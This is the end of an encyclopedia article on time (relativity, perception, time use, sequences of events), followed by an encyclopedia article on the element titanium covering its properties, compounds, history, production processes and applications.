For example, if a spaceship carrying a clock flies through space at (very nearly) the speed of light, its crew does not notice a change in the speed of time on board their vessel because everything traveling at the same speed slows down at the same rate (including the clock, the crew's thought processes, and the functions of their bodies). However, to a stationary observer watching the spaceship fly by, the spaceship appears flattened in the direction it is traveling and the clock on board the spaceship appears to move very slowly. On the other hand, the crew on board the spaceship also perceives the observer as slowed down and flattened along the spaceship's direction of travel, because both are moving at very nearly the speed of light relative to each other. Because the outside universe appears flattened to the spaceship, the crew perceives themselves as quickly traveling between regions of space that (to the stationary observer) are many light years apart. This is reconciled by the fact that the crew's perception of time is different from the stationary observer's; what seems like seconds to the crew might be hundreds of years to the stationary observer. In either case, however, causality remains unchanged: the past is the set of events that can send light signals to an entity and the future is the set of events to which an entity can send light signals. Dilation Einstein showed in his thought experiments that people travelling at different speeds, while agreeing on cause and effect, measure different time separations between events, and can even observe different chronological orderings between non-causally related events. Though these effects are typically minute in the human experience, they become much more pronounced for objects moving at speeds approaching the speed of light. Subatomic particles exist for a well-known average fraction of a second in a lab at rest relative to them, but when travelling close to the speed of light they are measured to travel farther and exist for much longer than when at rest. According to the special theory of relativity, in the high-speed particle's frame of reference, it exists, on the average, for a standard amount of time known as its mean lifetime, and the distance it travels in that time is zero, because its velocity is zero. Relative to a frame of reference at rest, time seems to "slow down" for the particle. Relative to the high-speed particle, distances seem to shorten. Einstein showed how both temporal and spatial dimensions can be altered (or "warped") by high-speed motion. Einstein (The Meaning of Relativity): "Two events taking place at the points A and B of a system K are simultaneous if they appear at the same instant when observed from the middle point, M, of the interval AB. Time is then defined as the ensemble of the indications of similar clocks, at rest relative to K, which register the same simultaneously." Einstein wrote in his book, Relativity, that simultaneity is also relative, i.e., two events that appear simultaneous to an observer in a particular inertial reference frame need not be judged as simultaneous by a second observer in a different inertial frame of reference. Relativistic versus Newtonian The animations visualise the different treatments of time in the Newtonian and the relativistic descriptions. At the heart of these differences are the Galilean and Lorentz transformations applicable in the Newtonian and relativistic theories, respectively. In the figures, the vertical direction indicates time. 
The horizontal direction indicates distance (only one spatial dimension is taken into account), and the thick dashed curve is the spacetime trajectory ("world line") of the observer. The small dots indicate specific (past and future) events in spacetime. The slope of the world line (deviation from being vertical) gives the relative velocity to the observer. In both pictures the view of spacetime changes when the observer accelerates. In the Newtonian description these changes are such that time is absolute: the movements of the observer do not influence whether an event occurs in the 'now' (i.e., whether an event passes the horizontal line through the observer). However, in the relativistic description the observability of events is absolute: the movements of the observer do not influence whether an event passes the "light cone" of the observer. Notice that with the change from a Newtonian to a relativistic description, the concept of absolute time is no longer applicable: events move up and down in the figure depending on the acceleration of the observer. Quantization Time quantization is a hypothetical concept. In the modern established physical theories (the Standard Model of Particles and Interactions and General Relativity), time is not quantized. Planck time (~5.4 × 10⁻⁴⁴ seconds) is the unit of time in the system of natural units known as Planck units. Current established physical theories are believed to fail at this time scale, and many physicists expect that the Planck time might be the smallest unit of time that could ever be measured, even in principle. Tentative physical theories that describe this time scale exist; see for instance loop quantum gravity. Thermodynamics The second law of thermodynamics states that entropy must increase over time (see Entropy). This can be in either direction – Brian Greene theorizes that, according to the equations, the change in entropy occurs symmetrically whether going forward or backward in time. So entropy tends to increase in either direction, and our current low-entropy universe is a statistical aberration, much as tossing a coin often enough will eventually produce ten heads in a row. However, this symmetric picture is not supported empirically by local experiments. Travel Time travel is the concept of moving backwards or forwards to different points in time, in a manner analogous to moving through space, and different from the normal "flow" of time to an earthbound observer. In this view, all points in time (including future times) "persist" in some way. Time travel has been a plot device in fiction since the 19th century. Travelling backwards or forwards in time has never been verified as a process, and doing so presents many theoretical problems and logical contradictions that have not, to date, been overcome. Any technological device, whether fictional or hypothetical, that is used to achieve time travel is known as a time machine. A central problem with time travel to the past is the violation of causality; should an effect precede its cause, it would give rise to the possibility of a temporal paradox. Some interpretations of time travel resolve this by accepting the possibility of travel between branch points, parallel realities, or universes. Another solution to the problem of causality-based temporal paradoxes is that such paradoxes cannot arise simply because they have not arisen. 
As illustrated in numerous works of fiction, free will either ceases to exist in the past or the outcomes of such decisions are predetermined. As such, it would not be possible to enact the grandfather paradox because it is a historical fact that one's grandfather was not killed before his child (one's parent) was conceived. This view does not simply hold that history is an unchangeable constant, but that any change made by a hypothetical future time traveller would already have happened in his or her past, resulting in the reality that the traveller moves from. More elaboration on this view can be found in the Novikov self-consistency principle. Perception The specious present refers to the time duration wherein one's perceptions are considered to be in the present. The experienced present is said to be 'specious' in that, unlike the objective present, it is an interval and not a durationless instant. The term specious present was first introduced by the psychologist E. R. Clay, and later developed by William James. Biopsychology The brain's judgment of time is known to rely on a highly distributed system, including at least the cerebral cortex, the cerebellum, and the basal ganglia. One particular component, the suprachiasmatic nuclei, is responsible for the circadian (or daily) rhythm, while other cell clusters appear capable of shorter-range (ultradian) timekeeping. Psychoactive drugs can impair the judgment of time. Stimulants can lead both humans and rats to overestimate time intervals, while depressants can have the opposite effect. The activity level of neurotransmitters such as dopamine and norepinephrine in the brain may be the reason for this. Such chemicals either excite or inhibit the firing of neurons, with a greater firing rate allowing the brain to register the occurrence of more events within a given interval (speeding up subjective time) and a decreased firing rate reducing the brain's capacity to distinguish events occurring within a given interval (slowing it down). Mental chronometry is the use of response time in perceptual-motor tasks to infer the content, duration, and temporal sequencing of cognitive operations. Early childhood education Children's expanding cognitive abilities allow them to understand time more clearly. Two- and three-year-olds' understanding of time is mainly limited to "now and not now". Five- and six-year-olds can grasp the ideas of past, present, and future. Seven- to ten-year-olds can use clocks and calendars. Alterations In addition to psychoactive drugs, judgments of time can be altered by temporal illusions (like the kappa effect), age, and hypnosis. The sense of time is impaired in some people with neurological diseases such as Parkinson's disease and attention deficit disorder. Psychologists assert that time seems to go faster with age, but the literature on this age-related perception of time remains controversial. Those who support this notion argue that young people, having more excitatory neurotransmitters, are able to cope with faster external events. Spatial conceptualization Although time is regarded as an abstract concept, there is increasing evidence that time is conceptualized in the mind in terms of space. That is, instead of thinking about time in a general, abstract way, humans think about time in a spatial way and mentally organize it as such. Using space to think about time allows humans to mentally organize temporal events in a specific way. 
This spatial conception of time is often represented in the mind as a Mental Time Line (MTL), which humans use to organize temporal order. The form of the MTL is shaped by many environmental factors: for example, literacy appears to play a large role in the different types of MTLs, as reading/writing direction provides an everyday temporal orientation that differs from culture to culture. In Western cultures, the MTL may unfold rightward (with the past on the left and the future on the right) since people read and write from left to right. Western calendars continue this trend by placing the past on the left with the future progressing toward the right. Conversely, speakers of Arabic, Farsi, Urdu, and Hebrew read from right to left; their MTLs unfold leftward (past on the right, future on the left), and evidence suggests these speakers organize temporal events in their minds accordingly. This linguistic evidence that abstract concepts are based in spatial concepts also reveals that the way humans mentally organize temporal events varies across cultures; that is, no single specific mental organization system is universal. So, although Western cultures typically associate past events with the left and future events with the right according to a certain MTL, this kind of horizontal, egocentric MTL is not the spatial organization of all cultures. Although most developed nations use an egocentric spatial system, there is recent evidence that some cultures use an allocentric spatialization, often based on environmental features. A study of the indigenous Yupno people of Papua New Guinea focused on the directional gestures used when individuals used time-related words. When speaking of the past (such as "last year" or "past times"), individuals gestured downhill, where the river of the valley flowed into the ocean. When speaking of the future, they gestured uphill, toward the source of the river. This was common regardless of which direction the person faced, revealing that the Yupno people may use an allocentric MTL, in which time flows uphill. A study of the Pormpuraawans, an Aboriginal group in Australia, revealed a related pattern: when asked to organize photos of a man aging "in order," individuals consistently placed the youngest photos to the east and the oldest photos to the west, regardless of which direction they faced. This directly clashed with an American group that consistently organized the photos from left to right. Therefore, this group also appears to have an allocentric MTL, but one based on the cardinal directions instead of geographical features. The wide array of distinctions in the way different groups think about time raises the broader question of whether different groups may also think about other abstract concepts, such as causality and number, in different ways. Use In sociology and anthropology, time discipline is the general name given to social and economic rules, conventions, customs, and expectations governing the measurement of time, the social currency and awareness of time measurements, and people's expectations concerning the observance of these customs by others. Arlie Russell Hochschild and Norbert Elias have written on the use of time from a sociological perspective. The use of time is an important issue in understanding human behavior, education, and travel behavior. Time-use research is a developing field of study. 
The question concerns how time is allocated across a number of activities (such as time spent at home, at work, shopping, etc.). Time use changes with technology, as television and the Internet have created new opportunities to use time in different ways. However, some aspects of time use are relatively stable over long periods, such as the amount of time spent traveling to work, which, despite major changes in transport, has been observed to be about 20–30 minutes one-way in a large number of cities over a long period. Time management is the organization of tasks or events by first estimating how much time a task requires and when it must be completed, and then adjusting events that would interfere with its completion so that it is done in the appropriate amount of time. Calendars and day planners are common examples of time management tools. Sequence of events A sequence of events, or series of events, is a sequence of items, facts, events, actions, changes, or procedural steps, arranged in time order (chronological order), often with causality relationships among the items. Because of causality, cause precedes effect, or cause and effect may appear together in a single item, but effect never precedes cause. A sequence of events can be presented in text, tables, charts, or timelines. The description of the items or events may include a timestamp. A sequence of events that includes the time along with place or location information to describe a sequential path may be referred to as a world line. Uses of a sequence of events include stories, historical events (chronology), directions and steps in procedures, and timetables for scheduling activities. A sequence of events may also be used to help describe processes in science, technology, and medicine. A sequence of events may be focused on past events (e.g., stories, history, chronology), on future events that must be in a predetermined order (e.g., plans, schedules, procedures, timetables), or focused on the observation of past events with the expectation that the events will occur in the future (e.g., processes, projections). The use of a sequence of events occurs in fields as diverse as machines (cam timer), documentaries (Seconds From Disaster), law (choice of law), finance (directional-change intrinsic time), computer simulation (discrete event simulation), and electric power transmission (sequence of events recorder). A specific example of a sequence of events is the timeline of the Fukushima Daiichi nuclear disaster.
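As a toy illustration of the sequence-of-events idea, the sketch below (Python; the event names and timestamps are invented for the example, loosely echoing the disaster timeline just mentioned) stores timestamped items and arranges them in chronological order, so that no effect is listed before its cause.

```python
from datetime import datetime

# Hypothetical timestamped events, deliberately listed out of order.
events = [
    ("cooling systems fail", datetime(2011, 3, 11, 16, 0)),
    ("earthquake strikes",   datetime(2011, 3, 11, 14, 46)),
    ("tsunami arrives",      datetime(2011, 3, 11, 15, 30)),
]

# A sequence of events is simply the items arranged in time order.
for name, when in sorted(events, key=lambda item: item[1]):
    print(when.isoformat(), "-", name)
```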
Physical sciences
Science and medicine
null
30040
https://en.wikipedia.org/wiki/Titanium
Titanium
Titanium is a chemical element; it has symbol Ti and atomic number 22. Found in nature only as an oxide, it can be reduced to produce a lustrous transition metal with a silver color, low density, and high strength, resistant to corrosion in sea water, aqua regia, and chlorine. Titanium was discovered in Cornwall, Great Britain, by William Gregor in 1791 and was named by Martin Heinrich Klaproth after the Titans of Greek mythology. The element occurs within a number of minerals, principally rutile and ilmenite, which are widely distributed in the Earth's crust and lithosphere; it is found in almost all living things, as well as bodies of water, rocks, and soils. The metal is extracted from its principal mineral ores by the Kroll and Hunter processes. The most common compound, titanium dioxide, is a popular photocatalyst and is used in the manufacture of white pigments. Other compounds include titanium tetrachloride (TiCl4), a component of smoke screens and catalysts; and titanium trichloride (TiCl3), which is used as a catalyst in the production of polypropylene. Titanium can be alloyed with iron, aluminium, vanadium, and molybdenum, among other elements. The resulting titanium alloys are strong, lightweight, and versatile, with applications including aerospace (jet engines, missiles, and spacecraft), military, industrial processes (chemicals and petrochemicals, desalination plants, pulp, and paper), automotive, agriculture (farming), sporting goods, jewelry, and consumer electronics. Titanium is also considered one of the most biocompatible metals, leading to a range of medical applications including prostheses, orthopedic implants, dental implants, and surgical instruments. The two most useful properties of the metal are corrosion resistance and strength-to-density ratio, the highest of any metallic element. In its unalloyed condition, titanium is as strong as some steels, but less dense. There are two allotropic forms and five naturally occurring isotopes of this element, 46Ti through 50Ti, with 48Ti being the most abundant (73.8%). Characteristics Physical properties As a metal, titanium is recognized for its high strength-to-weight ratio. It is a strong metal with low density that is quite ductile (especially in an oxygen-free environment), lustrous, and metallic-white in color. Due to its relatively high melting point (1,668 °C or 3,034 °F) it has sometimes been described as a refractory metal, but this is not the case. It is paramagnetic and has fairly low electrical and thermal conductivity compared to other metals. Titanium is superconducting when cooled below its critical temperature of 0.49 K. Commercially pure (99.2% pure) grades of titanium have ultimate tensile strength of about 434 MPa (63,000 psi), equal to that of common, low-grade steel alloys, but are less dense. Titanium is 60% denser than aluminium, but more than twice as strong as the most commonly used 6061-T6 aluminium alloy. Certain titanium alloys (e.g., Beta C) achieve tensile strengths of over 1,400 MPa (200,000 psi). However, titanium loses strength when heated above . Titanium is not as hard as some grades of heat-treated steel; it is non-magnetic and a poor conductor of heat and electricity. Machining requires precautions, because the material can gall unless sharp tools and proper cooling methods are used. Like steel structures, those made from titanium have a fatigue limit that guarantees longevity in some applications. 
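The strength-to-density comparisons above reduce to simple arithmetic: specific strength is ultimate tensile strength divided by density. The sketch below uses the 434 MPa figure quoted above for commercially pure titanium and the "over 1,400 MPa" figure for Beta C, together with rough handbook densities and a typical 6061-T6 strength; all of the densities and the aluminium figure are assumed illustrative values, not taken from this article.

```python
# Specific strength = ultimate tensile strength / density.
# Conveniently, MPa divided by g/cm^3 gives kN·m/kg.
materials = {
    #                      UTS (MPa), density (g/cm^3, rough handbook values)
    "CP titanium":           (434,  4.51),
    "low-grade steel":       (434,  7.85),  # comparable strength, far denser
    "6061-T6 aluminium":     (310,  2.70),  # typical quoted strength
    "Beta C titanium alloy": (1400, 4.82),
}

for name, (uts, rho) in materials.items():
    print(f"{name:>22}: {uts / rho:6.1f} kN·m/kg")
```

On these rough numbers, commercially pure titanium matches the steel's strength at a little over half the weight, and it is high-strength alloys such as Beta C that give titanium its standout specific strength.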
The metal is a dimorphic allotrope, with a hexagonal close-packed α form that changes into a body-centered cubic (lattice) β form at . The specific heat of the α form increases dramatically as it is heated to this transition temperature but then falls and remains fairly constant for the β form regardless of temperature. Chemical properties Like aluminium and magnesium, the surface of titanium metal and its alloys oxidizes immediately upon exposure to air to form a thin non-porous passivation layer that protects the bulk metal from further oxidation or corrosion. When it first forms, this protective layer is only 1–2 nm thick but it continues to grow slowly, reaching a thickness of 25 nm in four years. This layer gives titanium excellent resistance to corrosion by oxidizing acids, but it will dissolve in dilute hydrofluoric acid, hot hydrochloric acid, and hot sulfuric acid. Titanium withstands attack by dilute sulfuric and hydrochloric acids at room temperature, as well as by chloride solutions and most organic acids. However, titanium is corroded by concentrated acids. Titanium is a very reactive metal that burns in normal air at temperatures below its melting point. Melting is possible only in an inert atmosphere or vacuum. At , it combines with chlorine. It also reacts with the other halogens and absorbs hydrogen. Titanium readily reacts with oxygen at in air, and at in pure oxygen, forming titanium dioxide. Titanium is one of the few elements that burns in pure nitrogen gas, reacting at to form titanium nitride, which causes embrittlement. Because of its high reactivity with oxygen, nitrogen, and many other gases, titanium that is evaporated from filaments is the basis for titanium sublimation pumps, in which titanium serves as a scavenger for these gases by chemically binding to them. Such pumps inexpensively produce extremely low pressures in ultra-high vacuum systems. Occurrence Titanium is the ninth-most abundant element in Earth's crust (0.63% by mass) and the seventh-most abundant metal. It is present as oxides in most igneous rocks, in sediments derived from them, in living things, and in natural bodies of water. Of the 801 types of igneous rocks analyzed by the United States Geological Survey, 784 contained titanium. Its proportion in soils is approximately 0.5–1.5%. Common titanium-containing minerals are anatase, brookite, ilmenite, perovskite, rutile, and titanite (sphene). Akaogiite is an extremely rare mineral consisting of titanium dioxide. Of these minerals, only rutile and ilmenite have economic importance, yet even they are difficult to find in high concentrations. About 6.0 million tonnes of ilmenite and 0.7 million tonnes of rutile were mined in 2011. Significant titanium-bearing ilmenite deposits exist in Australia, Canada, China, India, Mozambique, New Zealand, Norway, Sierra Leone, South Africa, and Ukraine. About 210,000 tonnes of titanium metal sponge were produced in 2020, mostly in China (110,000 t), Japan (50,000 t), Russia (33,000 t) and Kazakhstan (15,000 t). Total reserves of anatase, ilmenite, and rutile are estimated to exceed 2 billion tonnes. The concentration of titanium in the ocean is about 4 picomolar. At 100 °C, the concentration of titanium in water is estimated to be less than 10⁻⁷ M at pH 7. The identity of titanium species in aqueous solution remains unknown because of its low solubility and the lack of sensitive spectroscopic methods, although only the 4+ oxidation state is stable in air. 
No evidence exists for a biological role, although rare organisms are known to accumulate high concentrations of titanium. Titanium is contained in meteorites, and it has been detected in the Sun and in M-type stars (the coolest type) with a surface temperature of . Rocks brought back from the Moon during the Apollo 17 mission are composed of 12.1% TiO2. Native titanium (pure metallic) is very rare. Isotopes Naturally occurring titanium is composed of five stable isotopes: 46Ti, 47Ti, 48Ti, 49Ti, and 50Ti, with 48Ti being the most abundant (73.8% natural abundance). At least 21 radioisotopes have been characterized, the most stable of which are 44Ti with a half-life of 63 years; 45Ti, 184.8 minutes; 51Ti, 5.76 minutes; and 52Ti, 1.7 minutes. All other radioactive isotopes have half-lives less than 33 seconds, with the majority less than half a second. The isotopes of titanium range from 39Ti to 64Ti. The primary decay mode for isotopes lighter than 46Ti is positron emission (with the exception of 44Ti, which undergoes electron capture), leading to isotopes of scandium, and the primary mode for isotopes heavier than 50Ti is beta emission, leading to isotopes of vanadium. Titanium becomes radioactive upon bombardment with deuterons, emitting mainly positrons and hard gamma rays. Compounds The +4 oxidation state dominates titanium chemistry, but compounds in the +3 oxidation state are also numerous. Commonly, titanium adopts an octahedral coordination geometry in its complexes, but tetrahedral TiCl4 is a notable exception. Because of its high oxidation state, titanium(IV) compounds exhibit a high degree of covalent bonding. Oxides, sulfides, and alkoxides The most important oxide is TiO2, which exists in three important polymorphs: anatase, brookite, and rutile. All three are white diamagnetic solids, although mineral samples can appear dark (see rutile). They adopt polymeric structures in which Ti is surrounded by six oxide ligands that link to other Ti centers. The term titanates usually refers to titanium(IV) compounds, as represented by barium titanate (BaTiO3). With a perovskite structure, this material exhibits piezoelectric properties and is used as a transducer in the interconversion of sound and electricity. Star sapphires and rubies get their asterism (star-shaped shine) from the presence of titanium dioxide impurities. A variety of reduced oxides (suboxides) of titanium are known, mainly reduced stoichiometries of titanium dioxide obtained by atmospheric plasma spraying. Ti3O5, described as a Ti(IV)-Ti(III) species, is a purple semiconductor produced by reduction of TiO2 with hydrogen at high temperatures, and is used industrially when surfaces need to be vapor-coated with titanium dioxide: it evaporates as pure TiO, whereas TiO2 evaporates as a mixture of oxides and deposits coatings with variable refractive index. Also known are Ti2O3, with the corundum structure, and TiO, with the rock salt structure, although both are often nonstoichiometric. The alkoxides of titanium(IV), prepared by treating TiCl4 with alcohols, are colorless compounds that convert to the dioxide on reaction with water. They are industrially useful for depositing solid TiO2 via the sol-gel process. Titanium isopropoxide is used in the synthesis of chiral organic compounds via the Sharpless epoxidation. Titanium forms a variety of sulfides, but only TiS2 has attracted significant interest. 
It adopts a layered structure and was used as a cathode in the development of lithium batteries. Because Ti(IV) is a "hard cation", the sulfides of titanium are unstable and tend to hydrolyze to the oxide with release of hydrogen sulfide. Nitrides and carbides Titanium nitride (TiN) is a refractory solid exhibiting extreme hardness, thermal/electrical conductivity, and a high melting point. TiN has a hardness equivalent to sapphire and carborundum (9.0 on the Mohs scale), and is often used to coat cutting tools, such as drill bits. It is also used as a gold-colored decorative finish and as a barrier layer in semiconductor fabrication. Titanium carbide (TiC), which is also very hard, is found in cutting tools and coatings. Halides Titanium tetrachloride (titanium(IV) chloride, TiCl4) is a colorless volatile liquid (commercial samples are yellowish) that, in air, hydrolyzes with spectacular emission of white clouds. Via the Kroll process, TiCl4 is used in the conversion of titanium ores to titanium metal. Titanium tetrachloride is also used to make titanium dioxide, e.g., for use in white paint. It is widely used in organic chemistry as a Lewis acid, for example in the Mukaiyama aldol condensation. In the van Arkel–de Boer process, titanium tetraiodide (TiI4) is generated in the production of high purity titanium metal. Titanium(III) and titanium(II) also form stable chlorides. A notable example is titanium(III) chloride (TiCl3), which is used as a catalyst for the production of polyolefins (see Ziegler–Natta catalyst) and as a reducing agent in organic chemistry. Organometallic complexes Owing to the important role of titanium compounds as polymerization catalysts, compounds with Ti–C bonds have been intensively studied. The most common organotitanium complex is titanocene dichloride ((C5H5)2TiCl2). Related compounds include Tebbe's reagent and Petasis reagent. Titanium forms carbonyl complexes, e.g. (C5H5)2Ti(CO)2. Anticancer therapy studies Following the success of platinum-based chemotherapy, titanium(IV) complexes were among the first non-platinum compounds to be tested for cancer treatment. The advantage of titanium compounds lies in their high efficacy and low toxicity in vivo. In biological environments, hydrolysis leads to the safe and inert titanium dioxide. Despite these advantages, the first candidate compounds failed clinical trials due to insufficient efficacy-to-toxicity ratios and formulation complications. Further development resulted in the creation of potentially effective, selective, and stable titanium-based drugs. History Titanium was discovered in 1791 by the clergyman and geologist William Gregor as an inclusion of a mineral in Cornwall, Great Britain. Gregor recognized the presence of a new element in ilmenite when he found black sand by a stream and noticed the sand was attracted by a magnet. Analyzing the sand, he determined the presence of two metal oxides: iron oxide (explaining the attraction to the magnet) and 45.25% of a white metallic oxide he could not identify. Realizing that the unidentified oxide contained a metal that did not match any known element, in 1791 Gregor reported his findings in both German and French science journals: Crell's Annalen and Observations et Mémoires sur la Physique. He named this oxide manaccanite. Around the same time, Franz-Joseph Müller von Reichenstein produced a similar substance, but could not identify it. 
The oxide was independently rediscovered in 1795 by Prussian chemist Martin Heinrich Klaproth in rutile from Boinik (the German name of Bajmócska), a village in Hungary (now Bojničky in Slovakia). Klaproth found that it contained a new element and named it for the Titans of Greek mythology. After hearing about Gregor's earlier discovery, he obtained a sample of manaccanite and confirmed that it contained titanium. The currently known processes for extracting titanium from its various ores are laborious and costly; it is not possible to reduce the ore by heating with carbon (as in iron smelting) because titanium combines with the carbon to produce titanium carbide. Titanium of 95% purity was extracted by Lars Fredrik Nilson and Otto Pettersson. To achieve this, they chlorinated titanium oxide in a carbon monoxide atmosphere with chlorine gas before reducing it to titanium metal with sodium. Pure metallic titanium (99.9%) was first prepared in 1910 by Matthew A. Hunter at Rensselaer Polytechnic Institute by heating TiCl4 with sodium under great pressure in a batch process known as the Hunter process. Titanium metal was not used outside the laboratory until 1932, when William Justin Kroll produced it by reducing titanium tetrachloride (TiCl4) with calcium. Eight years later he refined this process with magnesium and with sodium in what became known as the Kroll process. Although research continues to seek cheaper and more efficient routes, such as the FFC Cambridge process, the Kroll process is still predominantly used for commercial production. Titanium of very high purity was made in small quantities when Anton Eduard van Arkel and Jan Hendrik de Boer discovered the iodide process in 1925, by reacting titanium with iodine and decomposing the resulting vapors over a hot filament to yield pure metal. In the 1950s and 1960s, the Soviet Union pioneered the use of titanium in military and submarine applications (Alfa class and Mike class) as part of programs related to the Cold War. Starting in the early 1950s, titanium came into extensive use in military aviation, particularly in high-performance jets, starting with aircraft such as the F-100 Super Sabre, the Lockheed A-12, and the SR-71. Throughout the Cold War period, titanium was considered a strategic material by the U.S. government, and a large stockpile of titanium sponge (a porous form of the pure metal) was maintained by the Defense National Stockpile Center, until the stockpile was dispersed in the 2000s. As of 2021, the four leading producers of titanium sponge were China (52%), Japan (24%), Russia (16%) and Kazakhstan (7%). Production Mineral beneficiation processes The Becher process is an industrial process used to produce synthetic rutile, a form of titanium dioxide, from the ore ilmenite. The Chloride process. The Sulfate process: "relies on sulfuric acid (H2SO4) to leach titanium from ilmenite ore (FeTiO3). The resulting reaction produces titanyl sulfate (TiOSO4). A secondary hydrolysis stage is used to break the titanyl sulfate into hydrated TiO2 and H2SO4. Finally, heat is used to remove the water and create the end product - pure TiO2." Purification processes Hunter process The Hunter process was the first industrial process to produce pure metallic titanium. It was invented in 1910 by Matthew A. Hunter, a chemist born in New Zealand who worked in the United States. The process involves reducing titanium tetrachloride (TiCl4) with sodium (Na) in a batch reactor with an inert atmosphere at a temperature of 1,000 °C. 
Dilute hydrochloric acid is then used to leach the salt from the product. TiCl4(g) + 4 Na(l) → 4 NaCl(l) + Ti(s) Kroll process The processing of titanium metal occurs in four major steps: reduction of titanium ore into "sponge", a porous form; melting of sponge, or sponge plus a master alloy, to form an ingot; primary fabrication, where an ingot is converted into general mill products such as billet, bar, plate, sheet, strip, and tube; and secondary fabrication of finished shapes from mill products. Because it cannot be readily produced by reduction of titanium dioxide, titanium metal is obtained by reduction of titanium tetrachloride (TiCl4) with magnesium metal in the Kroll process. The complexity of this batch production in the Kroll process explains the relatively high market value of titanium, despite the Kroll process being less expensive than the Hunter process. To produce the TiCl4 required by the Kroll process, the dioxide is subjected to carbothermic reduction in the presence of chlorine. In this process, the chlorine gas is passed over a red-hot mixture of rutile or ilmenite in the presence of carbon. After extensive purification by fractional distillation, the TiCl4 is reduced with molten magnesium in an argon atmosphere: 2 FeTiO3 + 7 Cl2 + 6 C → 2 FeCl3 + 2 TiCl4 + 6 CO (at 900 °C); TiCl4 + 2 Mg → Ti + 2 MgCl2 (at 1100 °C). Arkel-Boer process The van Arkel–de Boer process was the first semi-industrial process for pure titanium. It involves thermal decomposition of titanium tetraiodide. Armstrong process Titanium powder is manufactured using a flow production process known as the Armstrong process, which is similar to the batch-production Hunter process. A stream of titanium tetrachloride gas is added to a stream of molten sodium; the products (sodium chloride salt and titanium particles) are filtered from the extra sodium. Titanium is then separated from the salt by water washing. Both sodium and chlorine are recycled to produce and process more titanium tetrachloride. Pilot plants Methods for electrolytic production of Ti metal using molten salt electrolytes have been researched and tested at laboratory and small pilot plant scales. The lead author of an impartial review published in 2017 considered his own process "ready for scaling up." A 2023 review "discusses the electrochemical principles involved in the recovery of metals from aqueous solutions and fused salt electrolytes", with particular attention paid to titanium. While some metals such as nickel and copper can be refined by electrowinning at room temperature, titanium must be in the molten state and "there is a strong chance of attack of the refractory lining by molten titanium." Zhang et al. concluded in their 2017 Perspective on Thermochemical and Electrochemical Processes for Titanium Metal Production that "Even though there are strong interests in the industry for finding a better method to produce Ti metal, and a large number of new concepts and improvements have been investigated at the laboratory or even at pilot plant scales, there is no new process to date that can replace the Kroll process commercially." The hydrogen-assisted magnesiothermic reduction (HAMR) process uses titanium dihydride. Fabrication All welding of titanium must be done in an inert atmosphere of argon or helium to shield it from contamination with atmospheric gases (oxygen, nitrogen, and hydrogen). Contamination causes a variety of conditions, such as embrittlement, which reduce the integrity of the assembly welds and lead to joint failure. 
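As a rough mass-balance check on the Kroll reduction shown above (TiCl4 + 2 Mg → Ti + 2 MgCl2), the sketch below estimates the titanium tetrachloride and magnesium consumed per kilogram of titanium sponge; it assumes ideal stoichiometry and standard atomic masses, whereas a real plant runs with excess magnesium and recycles it, so these figures are lower bounds.

```python
# Ideal-stoichiometry mass balance for TiCl4 + 2 Mg -> Ti + 2 MgCl2.
M_TI, M_MG, M_CL = 47.867, 24.305, 35.45   # standard atomic masses, g/mol

m_ticl4 = M_TI + 4 * M_CL        # molar mass of TiCl4 (~189.7 g/mol)
mol_ti = 1000.0 / M_TI           # moles of Ti in 1 kg of sponge

print(f"TiCl4 consumed: {mol_ti * m_ticl4 / 1000:.2f} kg per kg of Ti")  # ~3.96
print(f"Mg consumed:    {mol_ti * 2 * M_MG / 1000:.2f} kg per kg of Ti") # ~1.02
```

Handling several kilograms of reactive feedstock per kilogram of product, in batches and under argon, is a large part of why Kroll-process titanium remains expensive relative to steel.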
Titanium is very difficult to solder directly, and hence a solderable metal or alloy such as steel is coated onto titanium prior to soldering. Titanium metal can be machined with the same equipment and the same processes as stainless steel. Titanium alloys Common titanium alloys are made by reduction. For example, cuprotitanium (rutile with copper added), ferrocarbon titanium (ilmenite reduced with coke in an electric furnace), and manganotitanium (rutile with manganese or manganese oxides) are reduced. Some fifty grades of titanium alloys have been designed and are currently used, although only a couple of dozen are readily available commercially. ASTM International recognizes 31 grades of titanium metal and alloys, of which grades one through four are commercially pure (unalloyed). Those four vary in tensile strength as a function of oxygen content, with grade 1 being the most ductile (lowest tensile strength, with an oxygen content of 0.18%), and grade 4 the least ductile (highest tensile strength, with an oxygen content of 0.40%). The remaining grades are alloys, each designed for specific properties of ductility, strength, hardness, electrical resistivity, creep resistance, specific corrosion resistance, and combinations thereof. In addition to the ASTM specifications, titanium alloys are also produced to meet aerospace and military specifications (SAE-AMS, MIL-T), ISO standards, and country-specific specifications, as well as proprietary end-user specifications for aerospace, military, medical, and industrial applications. Forming and forging Commercially pure flat product (sheet, plate) can be formed readily, but processing must take into account the tendency of the metal to spring back. This is especially true of certain high-strength alloys. Exposure to the oxygen in air at the elevated temperatures used in forging results in formation of a brittle oxygen-rich metallic surface layer called "alpha case" that worsens the fatigue properties, so it must be removed by milling, etching, or electrochemical treatment. The working of titanium is very complicated, and may include friction welding, cryo-forging, and vacuum arc remelting. Applications Titanium is used in steel as an alloying element (ferro-titanium) to reduce grain size and as a deoxidizer, and in stainless steel to reduce carbon content. Titanium is often alloyed with aluminium (to refine grain size), vanadium, copper (to harden), iron, manganese, molybdenum, and other metals. Titanium mill products (sheet, plate, bar, wire, forgings, castings) find application in industrial, aerospace, recreational, and emerging markets. Powdered titanium is used in pyrotechnics as a source of bright-burning particles. Pigments, additives, and coatings About 95% of all titanium ore is destined for refinement into titanium dioxide (TiO2), an intensely white permanent pigment used in paints, paper, toothpaste, and plastics. It is also used in cement, in gemstones, and as an optical opacifier in paper. TiO2 pigment is chemically inert, resists fading in sunlight, and is very opaque: it imparts a pure and brilliant white color to the brown or grey chemicals that form the majority of household plastics. In nature, this compound is found in the minerals anatase, brookite, and rutile. Paint made with titanium dioxide does well in severe temperatures and marine environments. Pure titanium dioxide has a very high index of refraction and an optical dispersion higher than diamond. Titanium dioxide is used in sunscreens because it reflects and absorbs UV light. 
